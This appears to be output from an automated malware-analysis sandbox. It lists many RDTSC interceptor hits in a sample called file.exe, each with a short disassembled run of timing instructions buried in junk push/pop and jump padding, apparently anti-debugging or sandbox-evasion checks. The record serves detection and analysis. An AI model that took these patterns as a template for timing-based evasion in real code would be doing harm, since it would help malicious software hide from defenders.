Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAA5F second address: CAAA63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAABBD second address: CAABDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4994017Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F7A49940176h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAABDE second address: CAABEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAABEC second address: CAAC0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A49940188h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAAC0A second address: CAAC1A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F7A4900AE66h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAADB0 second address: CAADB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAFA4A second address: CAFA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAFA4E second address: CAFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7552 second address: CB7558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7721 second address: CB7725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7725 second address: CB7729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7729 second address: CB775A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F7A4994018Bh 0x0000000c pushad 0x0000000d jmp 00007F7A4994017Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7B17 second address: CB7B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7DA1 second address: CB7DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7DA7 second address: CB7DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7DAC second address: CB7DCB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7A49940191h 0x00000008 jmp 00007F7A49940185h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F3A second address: CB7F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F40 second address: CB7F69 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7A49940176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b ja 00007F7A49940176h 0x00000011 jns 00007F7A49940176h 0x00000017 pop ecx 0x00000018 jno 00007F7A4994017Ch 0x0000001e pushad 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB83D3 second address: CB83D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9178 second address: CB917D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB917D second address: CB9189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7A4900AE66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9189 second address: CB9193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9193 second address: CB91A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB91A3 second address: CB91BE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007F7A49940176h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F7A49940178h 0x00000012 push eax 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB70A8 second address: CB70CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F7A4900AE79h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB70CA second address: CB70D4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7A49940176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB70D4 second address: CB70E2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7A4900AE68h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB70E2 second address: CB70EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7A49940176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE9D4 second address: CBE9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE9D9 second address: CBE9E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jc 00007F7A49940176h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE9E6 second address: CBEA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7A4900AE73h 0x0000000f jnl 00007F7A4900AE66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBEA0B second address: CBEA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBEA18 second address: CBEA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F7A4900AE66h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBEA25 second address: CBEA2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC4AA5 second address: CC4AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC4AAB second address: CC4AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD702 second address: CCD708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD708 second address: CCD72D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7A4994017Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7A4994017Bh 0x00000012 jng 00007F7A49940176h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD72D second address: CCD73C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7A4900AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD73C second address: CCD756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A49940184h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD203 second address: CCD211 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7A4900AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCD211 second address: CCD215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCFACE second address: CCFADD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7A4900AE6Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3379 second address: CD3389 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F7A49940176h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2EC3 second address: CD2ECB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3028 second address: CD302C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD302C second address: CD3030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3030 second address: CD3042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3042 second address: CD3046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3046 second address: CD304C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD304C second address: CD306B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7A4900AE75h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD96FB second address: CD96FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE1CF3 second address: CE1D03 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7A4900AE72h 0x00000008 jg 00007F7A4900AE66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA702 second address: CEA708 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA826 second address: CEA82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA82A second address: CEA849 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7A49940176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F7A4994017Bh 0x00000012 jbe 00007F7A49940176h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA849 second address: CEA84F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA84F second address: CEA853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA853 second address: CEA886 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE73h 0x00000007 jmp 00007F7A4900AE73h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jno 00007F7A4900AE66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEA886 second address: CEA88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB14A second address: CEB159 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7A4900AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEB159 second address: CEB15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEBB78 second address: CEBB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEFC09 second address: CEFC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF726 second address: CEF72C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF72C second address: CEF773 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F7A49940176h 0x00000009 jmp 00007F7A49940181h 0x0000000e pop edx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F7A49940182h 0x00000017 pop eax 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F7A499401B5h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7A4994017Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF773 second address: CEF794 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7A4900AE77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF794 second address: CEF798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF798 second address: CEF79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF901 second address: CEF909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF0B0 second address: CFF0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF0B5 second address: CFF0CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A49940181h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF0CA second address: CFF0CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D032CF second address: D032DF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7A49940176h 0x00000008 jnp 00007F7A49940176h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06710 second address: D06723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4900AE6Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06723 second address: D06729 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D06729 second address: D0673D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F7A4900AE66h 0x0000000d jnc 00007F7A4900AE66h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0673D second address: D0676D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4994017Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F7A49940189h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0676D second address: D0677D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F7A4900AE66h 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01CE4 second address: D01CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01CE8 second address: D01D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7A4900AE79h 0x0000000c jnp 00007F7A4900AE66h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01D11 second address: D01D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01D17 second address: D01D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01D1B second address: D01D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D15317 second address: D15371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4900AE6Dh 0x00000009 js 00007F7A4900AE78h 0x0000000f jmp 00007F7A4900AE70h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7A4900AE75h 0x00000020 jmp 00007F7A4900AE77h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D15371 second address: D15385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F7A4994017Eh 0x0000000c ja 00007F7A49940176h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14E99 second address: D14EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7A4900AE66h 0x0000000a jmp 00007F7A4900AE73h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14EB7 second address: D14EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F7A49940176h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1500A second address: D1500E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1500E second address: D15040 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F7A49940176h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7A4994017Bh 0x00000011 popad 0x00000012 jg 00007F7A4994018Fh 0x00000018 push ebx 0x00000019 jmp 00007F7A49940181h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2BCD6 second address: D2BD08 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7A4900AE66h 0x00000008 jmp 00007F7A4900AE6Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F7A4900AE78h 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2BD08 second address: D2BD2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7A49940187h 0x0000000b jo 00007F7A49940176h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30A71 second address: D30A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30A75 second address: D30A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7A49940185h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C074CE second address: C074D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C074D2 second address: C074F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7A49940176h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F7A49940182h 0x00000012 jo 00007F7A49940176h 0x00000018 jng 00007F7A49940176h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C074F4 second address: C0750B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4900AE73h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0750B second address: C0750F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F964 second address: D2F985 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7A4900AE66h 0x00000008 jp 00007F7A4900AE66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 je 00007F7A4900AE66h 0x00000017 jno 00007F7A4900AE66h 0x0000001d pop ebx 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FAD6 second address: D2FAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7A49940176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FE29 second address: D2FE40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A4900AE71h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FE40 second address: D2FE44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
